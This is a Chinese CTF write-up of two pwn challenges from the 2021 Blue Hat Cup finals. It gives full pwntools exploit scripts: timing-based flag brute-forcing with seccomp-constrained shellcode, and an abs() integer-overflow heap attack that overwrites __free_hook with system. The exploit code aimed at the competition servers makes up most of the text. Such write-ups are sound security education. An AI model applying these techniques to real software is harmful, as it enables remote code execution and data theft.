2021 蓝帽杯决赛 writeup

secretcode

去年决赛、今年线上初赛题目、今年决赛还是这题，一题 3 次

考点还是那样 open read 通过延时爆破 flag ，这次沙箱就多了个规则需要 fd 大于 0x14 才能调用 read ，多写一个 while 循环的事情

由于多了 while 循环 flag 位置变了一下，直接从第二个字符开始爆破

# encoding=utf-8
from pwn import *

file_path = "./chall"
context.arch = "amd64"
# context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)
debug = 0
# if debug:
#     p = process([file_path])
#     gdb.attach(p, "b *$rebase(0xC94)")
#     libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#     one_gadget = 0x0
#
# else:
#     p = remote('', 0)
#     libc = ELF('')
#     one_gadget = 0x0


def pwn(p, index, ch):

    # open
    # shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; xor esi, esi; pop rax; syscall;"
    shellcode = '''push 0x10034aaa;pop rdi;shr edi, 12;xor esi, esi;push 2;pop rax;syscall;'''

    shellcode += "add r15,1;cmp r15 , 0x14; jle $-24;"

    # read(rax, 0x10040, 0x50)
    # shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"

    # cmp and jz
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    shellcode = asm(shellcode)

    # p.sendlineafter("execution-box.\n", read_next.ljust(0x30))

    p.sendafter("\n", shellcode.ljust(0x40 - 14, b'a') + b'./flag')


index = 1
ans = []
while True:
    for ch in range(0x20, 127):
        if debug:
            p = process([file_path])
        else:
            # p = remote('8.131.246.36', 40334)
            p = remote("47.104.169.149",25178)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        if end - start > 1.5:
            ans.append(ch)
            print("".join([chr(i) for i in ans]))
            break
    else:
        print("".join([chr(i) for i in ans]))
        break
    index = index + 1
    print(ans)

print("".join([chr(i) for i in ans]))

normal-babynote

abs函数接收4字节有符号int数，当传入0x80000000时，其返回结果仍然是0x80000000，int正数将无法表示这么大，因此，其值是一个负数，造成堆溢出，可以修改自身的 size 位

from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']


def add(size,content):
    p.sendlineafter("> ",str(1))
    p.sendlineafter("> ",str(size))
    p.sendafter("> ",content)
def edit(id,offset,content):
    p.sendlineafter("> ",str(2))
    p.sendlineafter("> ",str(id))
    p.sendlineafter("> ",str(offset))
    p.sendafter("> ",content)
def delete(id):
    p.sendlineafter("> ",str(3))
    p.sendlineafter("> ",str(id))
def show(id):
    p.sendlineafter("> ",str(4))
    p.sendlineafter("> ",str(id))


p = process("./chall")
p = remote("47.104.169.149",14269)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

add(0xf8,'\n')#0
add(0x220,'\n')#1
add(0x100,'\n')#2
add(0x18,'/bin/sh\x00\n')

payload = 'a'*48
payload += p64(0x200)+p64(0x441) + '\n'
edit(0,0x80000000,payload)

delete(0)
add(0xf8,'\n')#0
show(1)
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(leak_addr)
libc_base = leak_addr-(0x7ffff7dcdca0-0x7ffff79e2000)
print hex(libc_base)
free_hook = libc_base+libc.symbols['__free_hook']
print "free_hook:",hex(free_hook)
system_addr = libc_base + libc.sym['system']
print system_addr

add(0x220,'\n')#1
delete(1)
edit(5,0,p64(free_hook)+'\n')
add(0x220,'\n')#1
add(0x220,'ls;\x00\n')#1

edit(7,0,p64(system_addr)+'\n')

# gdb.attach(p,"*$rebase(0xd1A)")
# raw_input()


delete(3)

'''
for i in range(10):
    add(0xf8,'\n')
for i in range(3,10):
    delete(i)
delete(0)

edit(2,0x80000000,payload)
delete(2)

for i in range(5):
    add(0xf8,'\n')
'''



# edit(1,0x80000000,'a'*0x200+'\n')


# edit(0,0x80000000,'a'*0x18+'\n')










p.interactive()